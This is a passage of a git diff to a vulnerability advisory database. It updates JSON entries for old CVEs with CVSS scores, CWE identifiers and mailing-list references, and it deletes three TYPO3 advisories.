"https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r5001ecf3d6b2bdd0b732e527654248abb264f08390045d30709a92f6%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5001ecf3d6b2bdd0b732e527654248abb264f08390045d30709a92f6@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r734a07156abf332d5ab27fb91d9d962cacfef4f3681e44056f064fa8%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r734a07156abf332d5ab27fb91d9d962cacfef4f3681e44056f064fa8@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + 
"url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r8c9983f1172a3415f915ddb7e14de632d2d0c326eb1285755a024165%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c9983f1172a3415f915ddb7e14de632d2d0c326eb1285755a024165@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rd65d8ba68ba17e7deedafbf5bb4899f2ae4dad781d21b931c2941ac3%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd65d8ba68ba17e7deedafbf5bb4899f2ae4dad781d21b931c2941ac3@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/re895fc1736d25c8cf57e102c871613b8aeec9ea26fd8a44e7942b5ab%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re895fc1736d25c8cf57e102c871613b8aeec9ea26fd8a44e7942b5ab@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": 
"https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3Ccvs.httpd.apache.org%3E" @@ -125,7 +180,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-120" + "CWE-120", + "CWE-131" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-c29f-v77w-5564/GHSA-c29f-v77w-5564.json b/advisories/unreviewed/2022/04/GHSA-c29f-v77w-5564/GHSA-c29f-v77w-5564.json index ef8e3cbef1b87..322c4785f49de 100644 --- a/advisories/unreviewed/2022/04/GHSA-c29f-v77w-5564/GHSA-c29f-v77w-5564.json +++ b/advisories/unreviewed/2022/04/GHSA-c29f-v77w-5564/GHSA-c29f-v77w-5564.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c29f-v77w-5564", - "modified": "2022-04-30T18:16:45Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-30T18:16:45Z", "aliases": [ "CVE-2001-0795" ], "details": "Perception LiteServe 1.25 allows remote attackers to obtain source code of CGI scripts via URLs that contain MS-DOS conventions such as (1) upper case letters or (2) 8.3 file names.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-c3mw-fh2q-7xx4/GHSA-c3mw-fh2q-7xx4.json b/advisories/unreviewed/2022/04/GHSA-c3mw-fh2q-7xx4/GHSA-c3mw-fh2q-7xx4.json index 1486907d5ae78..5312844902f11 100644 --- a/advisories/unreviewed/2022/04/GHSA-c3mw-fh2q-7xx4/GHSA-c3mw-fh2q-7xx4.json +++ b/advisories/unreviewed/2022/04/GHSA-c3mw-fh2q-7xx4/GHSA-c3mw-fh2q-7xx4.json 
@@ -21,6 +21,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26361"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/"
@@ -29,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-07"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2022/dsa-5117"
diff --git a/advisories/unreviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json b/advisories/unreviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json
deleted file mode 100644
index c8821030d36b9..0000000000000
--- a/advisories/unreviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json
+++ /dev/null
@@ -1,43 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-c7xr-736p-29j3",
- "modified": "2022-04-21T01:57:47Z",
- "published": "2022-04-21T01:57:47Z",
- "aliases": [
- "CVE-2010-3666"
- ],
- "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 contains insecure randomness in the uniqid function.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3666"
- },
- {
- "type": "WEB",
- "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719"
- },
- {
- "type": "WEB",
- "url": "https://security-tracker.debian.org/tracker/CVE-2010-3666"
- },
- {
- "type": "WEB",
- "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Insecure_Randomness"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-11-04T22:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/04/GHSA-c8cf-4f7h-ccj4/GHSA-c8cf-4f7h-ccj4.json b/advisories/unreviewed/2022/04/GHSA-c8cf-4f7h-ccj4/GHSA-c8cf-4f7h-ccj4.json
index 55d4657a76154..03bba6346586d 100644
--- a/advisories/unreviewed/2022/04/GHSA-c8cf-4f7h-ccj4/GHSA-c8cf-4f7h-ccj4.json
+++ b/advisories/unreviewed/2022/04/GHSA-c8cf-4f7h-ccj4/GHSA-c8cf-4f7h-ccj4.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c8cf-4f7h-ccj4", - "modified": "2022-04-30T18:17:37Z", + "modified": "2024-02-02T03:30:29Z", "published": "2022-04-30T18:17:37Z", "aliases": [ "CVE-2001-1238" ], "details": "Task Manager in Windows 2000 does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped with the Task Manager.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json b/advisories/unreviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json deleted file mode 100644 index 5016753e59788..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json +++ /dev/null 
@@ -1,43 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-cg45-qgcf-hf9x",
- "modified": "2022-04-21T01:57:46Z",
- "published": "2022-04-21T01:57:46Z",
- "aliases": [
- "CVE-2010-3660"
- ],
- "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows XSS on the backend.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3660"
- },
- {
- "type": "WEB",
- "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719"
- },
- {
- "type": "WEB",
- "url": "https://security-tracker.debian.org/tracker/CVE-2010-3660"
- },
- {
- "type": "WEB",
- "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#XSS"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-11-01T18:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/04/GHSA-cgjq-p4q9-cfj7/GHSA-cgjq-p4q9-cfj7.json b/advisories/unreviewed/2022/04/GHSA-cgjq-p4q9-cfj7/GHSA-cgjq-p4q9-cfj7.json
index 61f7152afaae2..9201a9f511658 100644
--- a/advisories/unreviewed/2022/04/GHSA-cgjq-p4q9-cfj7/GHSA-cgjq-p4q9-cfj7.json
+++ b/advisories/unreviewed/2022/04/GHSA-cgjq-p4q9-cfj7/GHSA-cgjq-p4q9-cfj7.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-cgjq-p4q9-cfj7",
- "modified": "2022-04-30T18:12:41Z",
+ "modified": "2024-02-08T21:30:28Z",
 "published": "2022-04-30T18:12:41Z",
 "aliases": [
 "CVE-1999-1549"
 ],
 "details": "Lynx 2.x does not properly distinguish between internal and external HTML, which may allow a local attacker to read a \"secure\" hidden form value from a temporary file and craft a LYNXOPTIONS: URL that causes Lynx to modify the user's configuration file and execute commands.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -29,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-346"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-cx2h-jfxr-vw9c/GHSA-cx2h-jfxr-vw9c.json b/advisories/unreviewed/2022/04/GHSA-cx2h-jfxr-vw9c/GHSA-cx2h-jfxr-vw9c.json
index 88d07f27e8249..300b3dec2da62 100644
--- a/advisories/unreviewed/2022/04/GHSA-cx2h-jfxr-vw9c/GHSA-cx2h-jfxr-vw9c.json
+++ b/advisories/unreviewed/2022/04/GHSA-cx2h-jfxr-vw9c/GHSA-cx2h-jfxr-vw9c.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-cx2h-jfxr-vw9c",
- "modified": "2022-04-29T02:58:39Z",
+ "modified": "2024-02-02T03:30:30Z",
 "published": "2022-04-29T02:58:39Z",
 "aliases": [
 "CVE-2004-0940"
 ],
 "details": "Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -22,30 +25,58 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17785" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r734a07156abf332d5ab27fb91d9d962cacfef4f3681e44056f064fa8%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r734a07156abf332d5ab27fb91d9d962cacfef4f3681e44056f064fa8@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rd65d8ba68ba17e7deedafbf5bb4899f2ae4dad781d21b931c2941ac3%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd65d8ba68ba17e7deedafbf5bb4899f2ae4dad781d21b931c2941ac3@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/re895fc1736d25c8cf57e102c871613b8aeec9ea26fd8a44e7942b5ab%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re895fc1736d25c8cf57e102c871613b8aeec9ea26fd8a44e7942b5ab@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf2f0f3611f937cf6cfb3b4fe4a67f69885855126110e1e3f2fb2728e%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf2f0f3611f937cf6cfb3b4fe4a67f69885855126110e1e3f2fb2728e@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", 
+ "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3Ccvs.httpd.apache.org%3E" @@ -105,7 +136,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-131" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json b/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json index a8d19d654a493..e878c3c30d1ca 100644 --- a/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json +++ b/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f2v4-c8r6-vfvj", - "modified": "2022-04-30T18:19:42Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-04-30T18:19:42Z", "aliases": [ "CVE-2002-0671" ], "details": "Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 downloads phone applications from a web site but can not verify the integrity of the applications, which could allow remote attackers to install Trojan horse applications via DNS spoofing.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-494" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-fc65-58v2-9r8h/GHSA-fc65-58v2-9r8h.json b/advisories/unreviewed/2022/04/GHSA-fc65-58v2-9r8h/GHSA-fc65-58v2-9r8h.json index 98e941f21eb03..6ddde16fb7994 100644 --- a/advisories/unreviewed/2022/04/GHSA-fc65-58v2-9r8h/GHSA-fc65-58v2-9r8h.json +++ b/advisories/unreviewed/2022/04/GHSA-fc65-58v2-9r8h/GHSA-fc65-58v2-9r8h.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fc65-58v2-9r8h", - "modified": "2022-04-30T18:21:16Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-30T18:21:16Z", "aliases": [ "CVE-2002-1484" ], "details": "DB4Web server, when configured to use verbose debug messages, allows remote attackers to use DB4Web as a proxy and attempt TCP connections to other systems (port scan) via a request for a URL that specifies the target IP address and port, which produces a connection status in the resulting error message.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-ffwc-j4xg-37cv/GHSA-ffwc-j4xg-37cv.json b/advisories/unreviewed/2022/04/GHSA-ffwc-j4xg-37cv/GHSA-ffwc-j4xg-37cv.json index 906213a798310..846d6a0281497 100644 --- a/advisories/unreviewed/2022/04/GHSA-ffwc-j4xg-37cv/GHSA-ffwc-j4xg-37cv.json +++ b/advisories/unreviewed/2022/04/GHSA-ffwc-j4xg-37cv/GHSA-ffwc-j4xg-37cv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ffwc-j4xg-37cv", - "modified": "2022-04-30T18:17:14Z", + "modified": "2024-02-02T03:30:28Z", "published": "2022-04-30T18:17:14Z", "aliases": [ "CVE-2001-1042" ], "details": "Transsoft Broker 5.9.5.0 allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-fgj9-8c8v-jfwq/GHSA-fgj9-8c8v-jfwq.json b/advisories/unreviewed/2022/04/GHSA-fgj9-8c8v-jfwq/GHSA-fgj9-8c8v-jfwq.json index f58fe62632190..75ead47302e4a 100644 
--- a/advisories/unreviewed/2022/04/GHSA-fgj9-8c8v-jfwq/GHSA-fgj9-8c8v-jfwq.json +++ b/advisories/unreviewed/2022/04/GHSA-fgj9-8c8v-jfwq/GHSA-fgj9-8c8v-jfwq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fgj9-8c8v-jfwq", - "modified": "2022-04-30T18:18:26Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:18:26Z", "aliases": [ "CVE-2002-0051" ], "details": "Windows 2000 allows local users to prevent the application of new group policy settings by opening Group Policy files with exclusive-read access.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-667" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-fjc3-77q6-8ffr/GHSA-fjc3-77q6-8ffr.json b/advisories/unreviewed/2022/04/GHSA-fjc3-77q6-8ffr/GHSA-fjc3-77q6-8ffr.json index 23d06eab2035a..8e870b4a92378 100644 --- a/advisories/unreviewed/2022/04/GHSA-fjc3-77q6-8ffr/GHSA-fjc3-77q6-8ffr.json +++ b/advisories/unreviewed/2022/04/GHSA-fjc3-77q6-8ffr/GHSA-fjc3-77q6-8ffr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fjc3-77q6-8ffr", - "modified": "2022-04-30T18:19:55Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:19:55Z", "aliases": [ "CVE-2002-0788" ], "details": "An interaction between PGP 7.0.3 with the \"wipe deleted files\" option, when used on Windows Encrypted File System (EFS), creates a cleartext temporary files that cannot be wiped or deleted due to strong permissions, which could allow certain local users or attackers with physical access to obtain cleartext information.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "LOW", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2022/04/GHSA-fjjp-8g8w-55f2/GHSA-fjjp-8g8w-55f2.json b/advisories/unreviewed/2022/04/GHSA-fjjp-8g8w-55f2/GHSA-fjjp-8g8w-55f2.json index d3854cdf18022..59d3ffaac4006 100644 --- a/advisories/unreviewed/2022/04/GHSA-fjjp-8g8w-55f2/GHSA-fjjp-8g8w-55f2.json +++ b/advisories/unreviewed/2022/04/GHSA-fjjp-8g8w-55f2/GHSA-fjjp-8g8w-55f2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fjjp-8g8w-55f2", - "modified": "2022-04-30T18:11:52Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:11:52Z", "aliases": [ "CVE-1999-1127" ], "details": "Windows NT 4.0 does not properly shut down invalid named pipe RPC connections, which allows remote attackers to cause a denial of service (resource exhaustion) via a series of connections containing malformed data, aka the \"Named Pipes Over RPC\" vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-772" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-g36g-xcjc-mwvj/GHSA-g36g-xcjc-mwvj.json b/advisories/unreviewed/2022/04/GHSA-g36g-xcjc-mwvj/GHSA-g36g-xcjc-mwvj.json index 416d871ecbaab..4a6816dd12d36 100644 --- a/advisories/unreviewed/2022/04/GHSA-g36g-xcjc-mwvj/GHSA-g36g-xcjc-mwvj.json +++ b/advisories/unreviewed/2022/04/GHSA-g36g-xcjc-mwvj/GHSA-g36g-xcjc-mwvj.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g36g-xcjc-mwvj", - "modified": "2022-04-29T02:58:25Z", + "modified": "2024-02-08T15:30:25Z", "published": "2022-04-29T02:58:25Z", "aliases": [ "CVE-2004-0816" ], "details": "Integer underflow in the firewall logging rules for iptables in Linux before 2.6.8 allows remote attackers to cause a denial of service (application crash) via a malformed IP packet.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-191" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json b/advisories/unreviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json deleted file mode 100644 index 297cbe8684ada..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json +++ /dev/null 
@@ -1,43 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-gqmh-5xmq-3fhg",
- "modified": "2022-04-21T01:57:47Z",
- "published": "2022-04-21T01:57:47Z",
- "aliases": [
- "CVE-2010-3671"
- ],
- "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 is open to a session fixation attack which allows remote attackers to hijack a victim's session.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3671"
- },
- {
- "type": "WEB",
- "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719"
- },
- {
- "type": "WEB",
- "url": "https://security-tracker.debian.org/tracker/CVE-2010-3671"
- },
- {
- "type": "WEB",
- "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Broken_Authentication_and_Session_Management"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-11-05T20:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/04/GHSA-grc6-2v8g-8xww/GHSA-grc6-2v8g-8xww.json b/advisories/unreviewed/2022/04/GHSA-grc6-2v8g-8xww/GHSA-grc6-2v8g-8xww.json
index 9fab4c5663c3d..3e11b6c8bb3a8 100644
--- a/advisories/unreviewed/2022/04/GHSA-grc6-2v8g-8xww/GHSA-grc6-2v8g-8xww.json
+++ b/advisories/unreviewed/2022/04/GHSA-grc6-2v8g-8xww/GHSA-grc6-2v8g-8xww.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-grc6-2v8g-8xww", - "modified": "2022-04-29T03:00:03Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-29T03:00:03Z", "aliases": [ "CVE-2004-1703" ], "details": "Fusion News 3.6.1 allows remote attackers to add user accounts, if the administrator is logged in, via a comment that contains an img bbcode tag that calls index.php with the signup action, which is executed when the administrator's browser loads the page with the img tag.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-h2cc-464x-vqhj/GHSA-h2cc-464x-vqhj.json b/advisories/unreviewed/2022/04/GHSA-h2cc-464x-vqhj/GHSA-h2cc-464x-vqhj.json index e0e3ca26f16b7..5490934091533 100644 --- a/advisories/unreviewed/2022/04/GHSA-h2cc-464x-vqhj/GHSA-h2cc-464x-vqhj.json +++ b/advisories/unreviewed/2022/04/GHSA-h2cc-464x-vqhj/GHSA-h2cc-464x-vqhj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h2cc-464x-vqhj", - "modified": "2022-04-30T18:21:42Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-04-30T18:21:42Z", "aliases": [ "CVE-2002-1713" ], "details": "The Standard security setting for Mandrake-Security package (msec) in Mandrake 8.2 installs home directories with world-readable permissions, which could allow local users to read other user's files.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-276" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-h6vw-m287-cx84/GHSA-h6vw-m287-cx84.json b/advisories/unreviewed/2022/04/GHSA-h6vw-m287-cx84/GHSA-h6vw-m287-cx84.json index 0d3d4216adf61..865c94dbdfe0f 100644 
